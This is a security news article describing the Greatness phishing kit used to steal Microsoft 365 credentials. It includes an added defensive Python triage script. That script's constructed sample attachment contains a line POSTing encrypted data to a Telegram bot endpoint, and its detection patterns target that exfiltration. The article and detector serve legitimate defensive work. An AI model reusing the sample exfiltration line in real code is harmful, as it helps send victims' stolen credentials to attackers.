Hackers use the Greatness PaaS tool to Steal Microsoft 365 login credentials

In Cybersecurity News - Original News Source is cybersecuritynews.com by Blog Writer


A new Phishing-as-a-Service (PaaS) tool called Greatness is being used by cybercriminals to steal Microsoft 365 login credentials.

First detected in 2022, Greatness allows attackers to bypass security measures and has been continuously updated with evasion tactics. 

Because it saves attackers development time and provides advanced capabilities, it is gaining popularity.

Law enforcement agencies are working to dismantle these services, with a recent takedown of LabHost.

Attackers are using QR code lures to target both employers and employees, and Greatness is being used to compromise user accounts and steal login credentials.

Attack Flow Of Greatness PaaS Attacks

The Greatness phishing tool initially used malicious HTML attachments disguised as login pages.


Server-side validation determined if an error message or the phishing page would be shown, and after public exposure, attackers shifted to PDF files and URLs to bypass detection. 

Captcha Evasion Display

Now they use multi-layered evasion, including CAPTCHAs and QR codes embedded in PDFs, to block automated analysis before the tool's own verification step; this makes the attacks difficult to stop, since detection relies on publicly available information.

It employs obfuscated content, including dynamically loaded JavaScript libraries and Base64 encoded strings, to hinder analysis, implements anti-bot measures, and encrypts data using AES with a PBKDF2-derived key. 

De-obfuscated Encryption Function

A JWT is generated with a Base64 encoded timestamp and used alongside encrypted data in AJAX requests.

Error handling is incorporated for various scenarios, including invalid data and failed requests. 

The script utilizes a Telegram token and API key for security and redirects users based on specific parameters, while obfuscation techniques such as Base64 encoding and string manipulation further complicate analysis.
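As an added illustration (not code from the article or from Trellix), the following Python script statically triages an HTML attachment for the traits described above: dynamically loaded JavaScript, PBKDF2/AES usage, Base64 strings that decode to login-themed text, AJAX posting, and Telegram bot API references. The sample attachment, the indicator list and the weights are constructed for this example and are not thresholds from the article or any vendor.

```python
import base64
import re

# Constructed sample of a phishing-style HTML attachment (not real kit code).
SAMPLE_HTML = """<html><body><script>
var s=document.createElement('script');s.src='https://cdn.example.test/crypto-js.min.js';
document.head.appendChild(s);
var k=CryptoJS.PBKDF2(pw,salt,{keySize:8,iterations:1000});
var c=CryptoJS.AES.encrypt(atob('TWljcm9zb2Z0IDM2NSBsb2dpbg=='),k);
$.ajax({type:'POST',url:'https://api.telegram.org/bot<TOKEN>/sendMessage',data:c});
</script></body></html>"""

# Constructed benign attachment used as a control.
BENIGN_HTML = "<html><body><p>Quarterly report attached.</p></body></html>"

# Heuristics: (name, regex, weight). Weights are assumptions for this example.
INDICATORS = [
    ("dynamic_script_load", re.compile(r"createElement\(['\"]script['\"]\)"), 2),
    ("pbkdf2_key_derivation", re.compile(r"PBKDF2", re.I), 3),
    ("aes_encrypt", re.compile(r"AES\.encrypt", re.I), 3),
    ("telegram_bot_api", re.compile(r"api\.telegram\.org/bot", re.I), 4),
    ("ajax_post", re.compile(r"\$\.ajax\(|XMLHttpRequest|fetch\(", re.I), 1),
]
B64_RE = re.compile(r"['\"]([A-Za-z0-9+/]{16,}={0,2})['\"]")
LOGIN_WORDS = ("microsoft", "login", "password", "office 365", "365")


def decode_base64_strings(html):
    """Decode quoted Base64 literals that yield printable UTF-8 text."""
    found = []
    for m in B64_RE.finditer(html):
        try:
            text = base64.b64decode(m.group(1), validate=True).decode("utf-8")
        except (ValueError, UnicodeDecodeError):
            continue
        if text.isprintable():
            found.append(text)
    return found


def triage_attachment(html):
    """Return (score, hit_names) for one HTML attachment; higher means more suspicious."""
    hits = [name for name, rx, _ in INDICATORS if rx.search(html)]
    score = sum(w for name, _, w in INDICATORS if name in hits)
    decoded = decode_base64_strings(html)
    if any(word in text.lower() for text in decoded for word in LOGIN_WORDS):
        hits.append("base64_login_lure")
        score += 3
    return score, hits


if __name__ == "__main__":
    print(triage_attachment(SAMPLE_HTML))
    print(triage_attachment(BENIGN_HTML))
```

Scoring like this is a triage aid for mail-gateway or sandbox pipelines, not a verdict; attachments above a chosen threshold should go to detonation or analyst review.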

De-obfuscated Function Call

It leverages an Adversary-in-the-Middle (AiTM) technique to bypass Multi-Factor Authentication (MFA): the phishing kit steals the credentials, intercepts the MFA prompt presented to the user, relays the MFA response to the legitimate service, and then uses the resulting session cookie to gain access while impersonating the victim.

Greatness primarily targets the United States financial services industry but has also been used against the manufacturing, energy, retail, and consulting sectors, where the phishing emails often contain a QR code that leads to a malicious link. 

Detection Graph

Researchers at Trellix found malicious URLs that steal user credentials and others that lead to seemingly legitimate shared files or eFax pages, which highlights the evolving threat posed by Greatness, a tool cybercriminals use to bypass security measures.
